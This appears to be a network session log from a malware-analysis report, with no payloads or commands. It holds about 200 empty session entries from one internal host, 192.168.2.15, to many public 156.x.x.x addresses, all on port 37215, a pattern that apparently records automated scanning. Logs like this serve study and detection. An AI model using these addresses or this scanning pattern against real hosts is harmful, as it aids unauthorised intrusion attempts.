                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16541192.168.2.1552842156.53.182.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16542192.168.2.1557786156.63.95.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16543192.168.2.1546114156.104.105.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16544192.168.2.1546658156.248.71.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16545192.168.2.1533242156.58.209.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16546192.168.2.1539604156.110.46.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16547192.168.2.1539300156.223.132.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16548192.168.2.1547674156.133.123.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16549192.168.2.1555760156.133.24.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16550192.168.2.1559100156.211.134.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16551192.168.2.1540592156.194.5.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16552192.168.2.1554592156.12.132.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16553192.168.2.1557658156.239.147.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16554192.168.2.1545708156.50.189.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16555192.168.2.1537252156.2.9.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16556192.168.2.1535540156.223.141.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16557192.168.2.1533288156.70.174.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16558192.168.2.1536890156.102.189.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16559192.168.2.1545348156.232.170.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16560192.168.2.1549768156.54.241.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16561192.168.2.1536756156.112.42.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16562192.168.2.1556094156.182.140.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16563192.168.2.1555268156.250.217.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16564192.168.2.1549388156.164.115.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16565192.168.2.1555424156.217.61.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16566192.168.2.1559166156.67.98.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16567192.168.2.1548186156.81.216.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16568192.168.2.1557946156.189.156.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16569192.168.2.1538768156.99.126.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16570192.168.2.1539552156.72.192.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16571192.168.2.1560614156.132.160.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16572192.168.2.1545420156.44.245.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16573192.168.2.1535302156.166.218.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16574192.168.2.1543684156.186.46.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16575192.168.2.1545176156.22.140.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16576192.168.2.1552962156.234.52.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16577192.168.2.1534204156.74.226.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16578192.168.2.1551070156.190.117.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16579192.168.2.1540714156.47.89.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16580192.168.2.1548656156.107.62.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16581192.168.2.1533062156.207.61.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16582192.168.2.1535460156.192.152.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16583192.168.2.1559948156.30.40.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16584192.168.2.1539926156.204.145.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16585192.168.2.1554082156.95.102.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16586192.168.2.1536084156.56.132.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16587192.168.2.1539724156.73.78.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16588192.168.2.1546056156.246.177.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16589192.168.2.1557126156.99.134.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16590192.168.2.1539308156.68.237.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16591192.168.2.1540122156.123.243.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16592192.168.2.1544680156.99.218.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16593192.168.2.1542112156.195.42.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16594192.168.2.1540148156.227.122.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16595192.168.2.1552636156.127.51.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16596192.168.2.1543478156.222.49.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16597192.168.2.1537218156.104.229.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16598192.168.2.1535064156.40.144.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16599192.168.2.1550462156.245.101.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16600192.168.2.1552248156.75.75.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16601192.168.2.1550096156.166.121.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16602192.168.2.1555806156.120.106.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16603192.168.2.1536556156.132.250.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16604192.168.2.1537586156.255.245.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16605192.168.2.1543934156.131.248.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16606192.168.2.1549582156.248.250.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16607192.168.2.1537256156.255.120.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16608192.168.2.1533992156.59.52.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16609192.168.2.1552602156.24.222.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16610192.168.2.1547848156.38.104.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16611192.168.2.1544970156.149.87.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16612192.168.2.1543038156.53.25.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16613192.168.2.1552502156.16.215.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16614192.168.2.1556014156.147.135.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16615192.168.2.1544424156.102.54.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16616192.168.2.1548668156.76.221.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16617192.168.2.1547114156.218.170.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16618192.168.2.1533962156.154.28.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16619192.168.2.1549920156.238.59.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16620192.168.2.1551764156.23.116.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16621192.168.2.1559198156.54.153.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16622192.168.2.1560312156.188.158.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16623192.168.2.1543308156.21.38.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16624192.168.2.1538406156.117.215.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16625192.168.2.1545542156.121.178.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16626192.168.2.1555168156.211.36.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16627192.168.2.1551962156.74.237.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16628192.168.2.1538600156.101.106.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16629192.168.2.1553802156.62.252.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16630192.168.2.1543116156.249.193.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16631192.168.2.1551998156.31.5.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16632192.168.2.1546366156.17.211.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16633192.168.2.1536902156.81.234.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16634192.168.2.1559130156.195.212.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16635192.168.2.1542092156.10.72.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16636192.168.2.1548164156.187.232.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16637192.168.2.1557960156.213.216.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16638192.168.2.1543684156.191.102.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16639192.168.2.1537080156.36.167.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16640192.168.2.1558206156.17.185.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16641192.168.2.1547490156.210.0.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16642192.168.2.1546688156.78.220.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16643192.168.2.1532846156.10.151.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16644192.168.2.1538586156.251.16.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16645192.168.2.1550828156.109.235.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16646192.168.2.1537582156.196.252.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16647192.168.2.1558806156.207.94.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16648192.168.2.1535494156.193.40.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16649192.168.2.1554234156.87.222.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16650192.168.2.1538292156.78.243.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16651192.168.2.1551988156.153.109.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16652192.168.2.1542368156.129.105.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16653192.168.2.1556954156.226.67.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16654192.168.2.1553922156.107.176.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16655192.168.2.1554120156.156.254.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16656192.168.2.1558606156.148.209.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16657192.168.2.1534176156.37.126.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16658192.168.2.1548840156.231.130.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16659192.168.2.1542566156.102.217.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16660192.168.2.1535884156.72.152.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16661192.168.2.1538416156.21.94.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16662192.168.2.1539786156.48.70.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16663192.168.2.1552456156.132.3.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16664192.168.2.1540336156.54.52.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16665192.168.2.1537794156.153.38.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16666192.168.2.1542512156.10.90.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16667192.168.2.1544376156.118.169.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16668192.168.2.1542788156.33.208.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16669192.168.2.1549848156.240.116.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16670192.168.2.1545768156.13.242.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16671192.168.2.1559966156.87.131.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16672192.168.2.1546022156.89.35.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16673192.168.2.1546204156.180.191.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16674192.168.2.1537554156.214.111.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16675192.168.2.1538090156.140.226.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16676192.168.2.1534336156.10.22.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16677192.168.2.1536168156.228.214.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16678192.168.2.1533296156.54.239.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16679192.168.2.1536496156.197.80.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16680192.168.2.1540360156.75.201.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16681192.168.2.1544216156.28.161.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16682192.168.2.1541772156.225.33.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16683192.168.2.1535176156.204.214.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16684192.168.2.1544622156.53.116.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16685192.168.2.1559982156.139.58.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16686192.168.2.1549988156.71.92.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16687192.168.2.1533206156.55.54.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16688192.168.2.1547084156.88.16.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16689192.168.2.1532860156.49.225.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16690192.168.2.1556332156.250.143.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16691192.168.2.1558784156.66.208.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16692192.168.2.1544116156.113.221.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16693192.168.2.1533140156.105.227.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16694192.168.2.1534952156.234.102.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16695192.168.2.1547574156.105.5.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16696192.168.2.1558072156.6.213.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16697192.168.2.1547302156.135.216.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16698192.168.2.1546004156.50.197.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16699192.168.2.1539846156.19.75.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16700192.168.2.1560002156.193.31.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16701192.168.2.1543666156.64.220.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16702192.168.2.1546204156.192.104.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16703192.168.2.1542892156.238.49.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16704192.168.2.1551862156.43.81.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16705192.168.2.1535214156.134.149.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16706192.168.2.1539140156.241.177.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16707192.168.2.1540360156.149.60.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16708192.168.2.1555870156.228.90.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16709192.168.2.1533912156.35.131.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16710192.168.2.1559828156.141.163.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16711192.168.2.1538508156.212.119.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16712192.168.2.1537902156.27.135.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16713192.168.2.1551078156.233.221.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16714192.168.2.1544642156.102.123.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16715192.168.2.1533516156.119.253.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16716192.168.2.1553856156.91.83.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16717192.168.2.1535186156.32.42.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16718192.168.2.1554376156.29.122.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16719192.168.2.1533894156.101.157.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16720192.168.2.1558928156.200.134.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16721192.168.2.1552690156.151.31.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16722192.168.2.1549996156.186.139.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16723192.168.2.1537506156.54.79.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16724192.168.2.1553532156.41.215.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16725192.168.2.1559288156.50.153.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16726192.168.2.1559454156.149.135.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16727192.168.2.1533254156.134.203.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16728192.168.2.1557158156.80.218.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16729192.168.2.1540814156.103.201.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16730192.168.2.1533120156.41.178.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16731192.168.2.1535324156.40.239.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16732192.168.2.1544138156.188.89.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16733192.168.2.1548506156.215.132.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16734192.168.2.1539924156.163.226.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16735192.168.2.1541208156.116.212.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16736192.168.2.1550768156.223.88.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16737192.168.2.1554840156.37.229.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16738192.168.2.1559772156.233.178.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16739192.168.2.1554118156.73.213.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16740192.168.2.1552206156.105.71.2037215
                                                                            TimestampBytes transferredDirectionData


